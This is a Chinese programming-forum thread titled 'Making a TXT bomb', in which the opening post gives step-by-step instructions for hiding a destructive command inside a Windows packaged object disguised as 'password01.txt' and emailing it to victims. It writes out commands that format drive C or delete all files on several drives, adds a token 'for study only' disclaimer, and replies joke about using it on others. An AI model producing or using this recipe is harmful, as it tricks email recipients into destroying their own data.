| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   

密 码:  
共有 927 人关注过本帖
标题:TXT炸弹的制作
只看楼主 加入收藏
燃燒
来 自:磁盘驱动器
等 级:贵宾
威 望:56
帖 子:9878
专家分:2
注 册:2006-4-20
结帖率:0
 问题点数:0 回复次数:25 
TXT炸弹的制作
1.创建一个只包含一个空格( 为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”。在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令 :start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默认名为"片段"),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作 为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当然大家可以改成其它的命令)

很简单,这样一个恶意的攻击程序被弄出来了!

(切记:仅供学习与研究,切莫用来攻击他人,更不要在没有安全准备的情况下执行上面的文件!)

搜索更多相关主题的帖子: TXT 炸弹 文档 对话框 对象 
kfwangguan
等 级:新手上路
帖 子:411
专家分:0
注 册:2005-7-17
得分:0 
没有人顶这个啊

willmasol
帖 子:21
注 册:2006-3-7

我来顶一下,不错,学习了

福尔摩斯
威 望:12
帖 子:4011
专家分:370
注 册:2006-8-15
这个是学来阴人的……

自我放逐。。。
tianykun
等 级:禁止访问
威 望:11
帖 子:3727
注 册:2005-11-13

学来看看。。好像可以整古人哦。。。呵呵。

离开这里,离开你的视野,归隐到属于我的地方,无论何处
king_2345484
帖 子:41
注 册:2006-5-25
"start.exe /m format c:/q /autotest /u"
"/m","/q","/u"和“/autotest”是什么意思啊 ?

福尔摩斯
威 望:12
帖 子:4011
专家分:370
注 册:2006-8-15

别的不知道

我只知道“/q”是快速的意思

format c:/q的意思是快速格式话C盘

自我放逐。。。
走刀口→超
威 望:20
帖 子:5018
注 册:2006-3-14
。。。我被带坏了。我要去害人。。哈哈~

人在江湖【走】,怎能不挨【刀】;为了能活【口】,唯有把己【超】!come on...
燃燒
来 自:磁盘驱动器
威 望:56
帖 子:9878
专家分:2
注 册:2006-4-20

不是吧 ..

我发这个只是为了让大家多了解一些命令的"另类"用法...

不是让大家 ...

如果是为了学习.在自己机器上搞就可以了哦..(不过后果本人一概不管...)

其实还有很多命令这样用起来也挺有意思的

大家举一反三吧!

Thinking in life, thinking in love, thinking in dream,thinking in you !
月光倾泻,岁月沉沦
[url=http://58189.]http://58189.[/url]
tianykun
等 级:禁止访问
威 望:11
帖 子:3727
注 册:2005-11-13
以下是引用走刀口→超在2006-9-6 11:28:28的发言:
。。。我被带坏了。我要去害人。。哈哈~

内因决定外因的。。。内因起决定作用,通过外因发挥。。。。
自己变坏咯。。。。不是被带坏。。。。不过想要熟练的害人可能先要在自己的机上试试哦。。
看着来啊。

离开这里,离开你的视野,归隐到属于我的地方,无论何处
快速回复:TXT炸弹的制作
数据加载中...

关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。